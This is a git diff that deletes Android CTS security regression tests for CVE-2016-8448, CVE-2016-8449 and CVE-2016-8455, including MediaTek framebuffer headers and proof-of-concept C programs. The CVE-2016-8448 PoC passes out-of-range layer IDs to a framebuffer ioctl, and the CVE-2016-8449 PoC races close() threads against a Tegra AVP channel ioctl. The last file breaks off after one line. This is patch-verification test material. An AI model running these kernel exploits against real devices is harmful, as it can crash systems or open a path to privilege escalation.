diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
deleted file mode 100644
index 01ffa37..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
+++ /dev/null
@@ -1,31 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8448
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
deleted file mode 100644
index b33073c..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
+++ /dev/null
@@ -1,397 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#ifndef __MTKFB_H
-#define __MTKFB_H
-
-#include <linux/types.h>
-#include "mtkfb_info.h"
-
-
-/**NOTICE:
- * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
- */
-#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
-#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
-#define FBCAPS_GENERIC_MASK (0x00000fff)
-#define FBCAPS_LCDC_MASK (0x00fff000)
-#define FBCAPS_PANEL_MASK (0xff000000)
-#define FBCAPS_MANUAL_UPDATE (0x00001000)
-#define FBCAPS_SET_BACKLIGHT (0x01000000)
-#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
-/* --------------------------------------------------------------------------- */
-/* IOCTL commands. */
-#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
-#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
-#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
-#define MTK_IO(num) _IO('O', num)
-#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
-/* -------------------------------------------------------------------------- */
-#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
-#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
-#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
-#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
-#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
-#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
-#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
-#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
-#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
-#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
-#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
-#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
-#define MTKFB_POWERON MTK_IO(12)
-#define MTKFB_POWEROFF MTK_IO(13)
-
-/* Fence/Ion, OVL decoupling */
-#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
-
-/* S3D control */
-#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
-#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
-
-/* FM De-sense for EM and Normal mode */
-#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
-#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
-/* for EM, not called change writecycle because DPI change pll ckl */
-#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
-#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
-#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
-#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
-/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
-#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
-#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
-#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
-#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
-#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
-
-/*error handling*/
-#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
-#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
-#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
-
-/*restore bootlogo and character in meta mode*/
-#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
-
-/*Extension FB active option*/
-#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
-/**
- * Just for mt6589 Platform
- * @{
- */
-#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
-#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
-#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
-#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
-#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
-
-/* -------------------------------------------------------------------------- */
-/* Video Playback Mode */
-#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
-#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
-/* For Factory Mode */
-#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
-
-/* -------------------------------------------------------------------------- */
-#define MTKFB_BOOTANIMATION MTK_IO(49)
-#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
-#define MTKFB_VSYNC MTK_IO(51)
-
-/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
-#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
-#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
-#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
-#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
-
-#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
-#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
-/**
- * @}
- */
-/* ---------------------------------------------------------------------- */
-
-/* -------------------------------------------------------------------------- */
-
-typedef enum {
- MTK_FB_ORIENTATION_0 = 0,
- MTK_FB_ORIENTATION_90 = 1,
- MTK_FB_ORIENTATION_180 = 2,
- MTK_FB_ORIENTATION_270 = 3,
-} MTK_FB_ORIENTATION;
-
-
-typedef enum {
- MTK_FB_TV_SYSTEM_NTSC = 0,
- MTK_FB_TV_SYSTEM_PAL = 1,
-} MTK_FB_TV_SYSTEM;
-
-
-typedef enum {
- MTK_FB_TV_FMT_RGB565 = 0,
- MTK_FB_TV_FMT_YUV420_SEQ = 1,
- MTK_FB_TV_FMT_UYUV422 = 2,
- MTK_FB_TV_FMT_YUV420_BLK = 3,
-} MTK_FB_TV_SRC_FORMAT;
-
-typedef enum {
- LAYER_NORMAL_BUFFER = 0,
- LAYER_SECURE_BUFFER = 1,
- LAYER_PROTECTED_BUFFER = 2,
- LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
-} MTK_FB_OVL_LAYER_SECURE_MODE;
-
-typedef struct _disp_dfo_item {
- char name[32];
- int value;
-} disp_dfo_item_t;
-
-/* -------------------------------------------------------------------------- */
-struct fb_slt_catpure {
- MTK_FB_FORMAT format;
-
- volatile char *outputBuffer;
- unsigned int wdma_width;
- unsigned int wdma_height;
-};
-
-struct fb_scale {
- unsigned int xscale, yscale;
-};
-
-struct fb_frame_offset {
- unsigned int idx;
- unsigned long offset;
-};
-
-struct fb_update_window {
- unsigned int x, y;
- unsigned int width, height;
-};
-
-typedef enum {
- LAYER_2D = 0,
- LAYER_3D_SBS_0 = 0x1,
- LAYER_3D_SBS_90 = 0x2,
- LAYER_3D_SBS_180 = 0x3,
- LAYER_3D_SBS_270 = 0x4,
- LAYER_3D_TAB_0 = 0x10,
- LAYER_3D_TAB_90 = 0x20,
- LAYER_3D_TAB_180 = 0x30,
- LAYER_3D_TAB_270 = 0x40,
-} MTK_FB_LAYER_TYPE;
-
-typedef enum {
- DISP_DIRECT_LINK_MODE,
- DISP_DECOUPLE_MODE
-} MTK_DISP_MODE;
-struct fb_overlay_mode {
- MTK_DISP_MODE mode;
-};
-
-typedef enum { /* map sessions to scenairos in kernel driver */
- DISP_SESSION_LCM = 1 << 0, /* DSI0 */
- DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
-/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
- DISP_SESSION_WFD = 1 << 2,
- DISP_SESSION_MHL = 1 << 3, /* DPI */
- DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
- DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
- /* TODO:can be extended with other Session Id */
- SESSION_MASK = 0xff & ~(1 << 6)
-} MTK_DISP_SESSION;
-
-struct fb_overlay_session {
- unsigned int session; /* one or more @MTK_DISP_SESSION combined */
-};
-
-struct fb_overlay_decouple {
- MTK_DISP_MODE mode;
- unsigned int session;
-};
-struct fb_overlay_buffer {
- /* Input */
- int layer_id;
- unsigned int layer_en;
- int ion_fd;
- unsigned int cache_sync;
- /* Output */
- unsigned int index;
- int fence_fd;
-};
-
-struct fb_overlay_layer {
- unsigned int layer_id;
- unsigned int layer_enable;
-
- void *src_base_addr;
- void *src_phy_addr;
- unsigned int src_direct_link;
- MTK_FB_FORMAT src_fmt;
- unsigned int src_use_color_key;
- unsigned int src_color_key;
- unsigned int src_pitch;
- unsigned int src_offset_x, src_offset_y;
- unsigned int src_width, src_height;
-
- unsigned int tgt_offset_x, tgt_offset_y;
- unsigned int tgt_width, tgt_height;
- MTK_FB_ORIENTATION layer_rotation;
- MTK_FB_LAYER_TYPE layer_type;
- MTK_FB_ORIENTATION video_rotation;
-
- unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
-
- int next_buff_idx;
- int identity;
- int connected_type;
- unsigned int security;
- unsigned int alpha_enable;
- unsigned int alpha;
- int fence_fd; /* 8135 */
- int ion_fd; /* 8135 CL 2340210 */
-};
-
-struct fb_overlay_config {
- int fence;
- int time;
- struct fb_overlay_layer layers[4];
-};
-
-struct fb_overlay_buffer_info {
- unsigned int src_vir_addr;
- unsigned int size;
-};
-
-struct fb_overlay_layer_info {
- unsigned int layer_id;
- unsigned int layer_enabled; /* TO BE DEL */
- unsigned int curr_en;
- unsigned int next_en;
- unsigned int hw_en;
- int curr_idx;
- int next_idx;
- int hw_idx;
- int curr_identity;
- int next_identity;
- int hw_identity;
- int curr_conn_type;
- int next_conn_type;
- int hw_conn_type;
- MTK_FB_ORIENTATION layer_rotation;
-};
-/* -------------------------------------------------------------------------- */
-
-struct fb_post_video_buffer {
- void *phy_addr;
- void *vir_addr;
- MTK_FB_TV_SRC_FORMAT format;
- unsigned int width, height;
-};
-
-#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
-extern unsigned int EnableVSyncLog;
-
-void mtkfb_log_enable(int enable);
-int mtkfb_set_backlight_mode(unsigned int mode);
-int mtkfb_set_backlight_level(unsigned int level);
-int mtkfb_get_debug_state(char *stringbuf, int buf_len);
-unsigned int mtkfb_fm_auto_test(void);
-void mtkfb_clear_lcm(void);
-#endif /* CONFIG_ARCH_MT6735 */
-
-#ifdef __KERNEL__
-
-#include <linux/completion.h>
-#include <linux/interrupt.h>
-#include <linux/workqueue.h>
-#include <linux/version.h>
-#include <../drivers/staging/android/sw_sync.h>
-
-
-#define MTKFB_DRIVER "mtkfb"
-
-enum mtkfb_state {
- MTKFB_DISABLED = 0,
- MTKFB_SUSPENDED = 99,
- MTKFB_ACTIVE = 100
-};
-
-typedef enum {
- MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
- MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
- MTKFB_LAYER_SET_DIRTY = (1 << 2),
-} MTKFB_LAYER_CONFIG_DIRTY;
-
-typedef struct {
- struct work_struct work;
- struct list_head list;
- struct fb_overlay_config config;
- struct sync_fence *fences[4];
- struct ion_handle *ion_handles[4];
- void *dev;
-} update_ovls_work_t;
-
-struct mtkfb_device {
- int state;
- void *fb_va_base; /* MPU virtual address */
- dma_addr_t fb_pa_base; /* Bus physical address */
- unsigned long fb_size_in_byte;
- void *ovl_va_base; /* MPU virtual address */
- dma_addr_t ovl_pa_base; /* Bus physical address */
- unsigned long ovl_size_in_byte;
-
- unsigned long layer_enable;
- MTK_FB_FORMAT *layer_format;
- unsigned int layer_config_dirty;
-
- int xscale, yscale, mirror; /* transformations.
- rotate is stored in fb_info->var */
- u32 pseudo_palette[17];
-
- struct fb_info *fb_info; /* Linux fbdev framework data */
- struct device *dev;
-
- /* Android native fence support */
- struct workqueue_struct *update_ovls_wq;
- struct mutex timeline_lock;
- struct sw_sync_timeline *timeline;
- int timeline_max;
- struct list_head pending_configs; /* CL2340210 */
- struct ion_client *ion_client;
-};
-
-#endif /* __KERNEL__ */
-
-extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
-
-#if defined(CONFIG_ARCH_MT6797)
-extern unsigned int vramsize;
-#endif
-
-#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
-extern bool is_early_suspended;
-extern void mtkfb_waitVsync(void);
-extern bool is_ipoh_bootup;
-
-#ifdef CONFIG_OF
-int _parse_tag_videolfb(void);
-extern unsigned int islcmconnected;
-extern unsigned int vramsize;
-#else
-extern char *saved_command_line;
-#endif
-#endif /* CONFIG_ARCH_MT6735 */
-
-
-#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
deleted file mode 100644
index 61e7cfd..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
+++ /dev/null
@@ -1,101 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#ifndef __MTKFB_INFO_H__
-#define __MTKFB_INFO_H__
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-
- typedef enum {
- DISPIF_TYPE_DBI = 0,
- DISPIF_TYPE_DPI,
- DISPIF_TYPE_DSI,
- DISPIF_TYPE_DPI0,
- DISPIF_TYPE_DPI1,
- DISPIF_TYPE_DSI0,
- DISPIF_TYPE_DSI1,
- HDMI = 7,
- HDMI_SMARTBOOK,
- MHL,
- DISPIF_TYPE_EPD,
- SLIMPORT
- } MTKFB_DISPIF_TYPE;
-
- typedef enum {
- MTKFB_DISPIF_PRIMARY_LCD = 0,
- MTKFB_DISPIF_HDMI,
- MTKFB_DISPIF_EPD,
- MTKFB_MAX_DISPLAY_COUNT
- } MTKFB_DISPIF_DEVICE_TYPE;
-
- typedef enum {
- DISPIF_FORMAT_RGB565 = 0,
- DISPIF_FORMAT_RGB666,
- DISPIF_FORMAT_RGB888
- } MTKFB_DISPIF_FORMAT;
-
-
- typedef enum {
- DISPIF_MODE_VIDEO = 0,
- DISPIF_MODE_COMMAND
- } MTKFB_DISPIF_MODE;
-
- typedef struct mtk_dispif_info {
- unsigned int display_id;
- unsigned int isHwVsyncAvailable;
- MTKFB_DISPIF_TYPE displayType;
- unsigned int displayWidth;
- unsigned int displayHeight;
- unsigned int displayFormat;
- MTKFB_DISPIF_MODE displayMode;
- unsigned int vsyncFPS;
- unsigned int physicalWidth;
- unsigned int physicalHeight;
- unsigned int isConnected;
-/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
- unsigned int lcmOriginalWidth;
-/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
- unsigned int lcmOriginalHeight;
- } mtk_dispif_info_t;
-
-#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
-
- typedef enum {
- MTK_FB_FORMAT_UNKNOWN = 0,
-
- MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
- MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
- MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
- MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
- MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
- MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
- MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
- MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
- MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
- MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
- MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
- MTK_FB_FORMAT_BPP_MASK = 0xFF,
- } MTK_FB_FORMAT;
-
-#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
-
-
-#ifdef __cplusplus
-}
-#endif
-#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
deleted file mode 100644
index e5f675b..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
+++ /dev/null
@@ -1,59 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#include <sys/mman.h>
-#include <fcntl.h>
-//#include <pthread.h>
-#include <sys/prctl.h>
-#include <unistd.h>
-#include <stdbool.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <asm-generic/ioctl.h>
-#include "mtkfb.h"
-int main(int argc, char **argv) {
- int fd = 0;
- struct fb_overlay_layer layerInfo;
- memset(&layerInfo, 0, sizeof(layerInfo));
- fd = open("/dev/graphics/fb0", O_RDWR);
- if (fd < 0) {
- perror("open /dev/graphics/fb0");
- exit(-1);
- }
- printf("Device file opened successfully\n");
- printf("Trying to get layer info\n");
- if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
- perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
- exit(-2);
- }
- printf("Got layer info\n");
- printf("Trying to set layer info\n");
- // set any huge value here
- int curr_val = 0xf1111111;
- while(1) {
- layerInfo.layer_id = curr_val;
- if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
- perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
- //exit(-2);
- }
- curr_val--;
- if(curr_val == -1) {
- break;
- }
- }
- printf("Set layer info\n");
- return 0;
-}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
deleted file mode 100644
index 72129c2..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2016 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8449
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS := -Wno-unused-parameter -Wall -Werror
-LOCAL_CFLAGS += -Wno-unused-variable
-LOCAL_LDFLAGS += -fPIE -pie
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
deleted file mode 100755
index 1e76b55..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
+++ /dev/null
@@ -1,143 +0,0 @@
-/*
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-#define _GNU_SOURCE
-#include <stdio.h>
-#include <string.h>
-#include <errno.h>
-#include <stdlib.h>
-#include <pthread.h>
-#include <sys/ioctl.h>
-#include <sys/mman.h>
-#include <errno.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sched.h>
-#include <sys/types.h>
-#include <signal.h>
-#include <unistd.h>
-
-#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
-#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
-#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
-#define CLOSE_THREAD_NUM 100
-#define TRY_TIMES 900
-
-#define DEV "/dev/tegra_avpchannel"
-
-#define NVAVP_IOCTL_MAGIC 'n'
-
-struct nvavp_channel_open_args {
- __u32 channel_fd;
-};
-
-#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
- struct nvavp_channel_open_args)
-
-int fd;
-pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
-
-static int set_affinity(int num)
-{
- int ret = 0;
- cpu_set_t mask;
- CPU_ZERO(&mask);
- CPU_SET(num, &mask);
- ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
- if(ret == -1){
- ERR("[-] set affinity failed");
- }
- return ret;
-}
-
-volatile int target_fd;
-volatile int attack;
-void* close_thread(void* no_use)
-{
- set_affinity(1);
-
- while(attack){
- close(target_fd);
- }
-
- return NULL;
-}
-
-int main()
-{
- int i, try_time = TRY_TIMES, ret;
- struct nvavp_channel_open_args o_args = { 0 };
-
- /* bind_cpu */
- set_affinity(0);
-
- /* open dev */
- fd = open(DEV, O_RDONLY);
- if(fd == -1){
- ERR("[-] open failed");
- return 0;
- } else {
- LOG("[+] open OK");
- }
-
- #if 1
- ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
- if(ret == -1) {
- ERR("[-] ioctl failed");
- goto out_dev;
- } else {
- LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
- }
-
- target_fd = o_args.channel_fd;
- #endif
-
- /* create close thread */
- #if 1
- attack = 1;
- for(i = 0; i < CLOSE_THREAD_NUM; i++){
- ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
- if(ret){
- ERR("[-] create close thread %d failed", i);
- goto out_close_thread;
- }
- }
- #endif
-
- #if 1
- for(i = 0; i < TRY_TIMES; i++){
- LOG("[+] %03d times", i);
- /* open */
- ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
- if(ret == -1) {
- ERR("[-] ioctl failed");
- } else {
- LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
- }
- //usleep(200);
- }
- #endif
-
-out_close_thread:
- attack = 0;
- /* kill close thread */
- for(i = 0; i < CLOSE_THREAD_NUM; i++){
- if(close_thread_id[i])
- pthread_join(close_thread_id[i], NULL);
- }
-out_dev:
- close(fd);
- return 0;
-}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8455/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8455/Android.mk
deleted file mode 100644
index 5ec4302..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8455/Android.mk
+++ /dev/null
@@ -1,39 +0,0 @@
-# Copyright (C) 2017 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH := $(call my-dir)
-
-include $(CLEAR_VARS)
-LOCAL_MODULE := CVE-2016-8455
-LOCAL_SRC_FILES := poc.c
-LOCAL_MULTILIB := both
-LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
-LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
-
-LOCAL_C_INCLUDES := external/libnl/include
-LOCAL_SHARED_LIBRARIES := libnl
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts
-LOCAL_CTS_TEST_PACKAGE := android.security.cts
-
-LOCAL_ARM_MODE := arm
-LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
-LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
-LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
-LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
-LOCAL_CFLAGS += -Iinclude -fPIE
-LOCAL_LDFLAGS += -fPIE -pie
-LOCAL_LDFLAGS += -rdynamic
-include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8455/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8455/poc.c
deleted file mode 100644
index 1f58e23..0000000
--- a/hostsidetests/security/securityPatch/CVE-2016-8455/poc.c
+++ /dev/null
@@ -1,318 +0,0 @@
-/**
- * Copyright (C) 2017 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#define _GNU_SOURCE
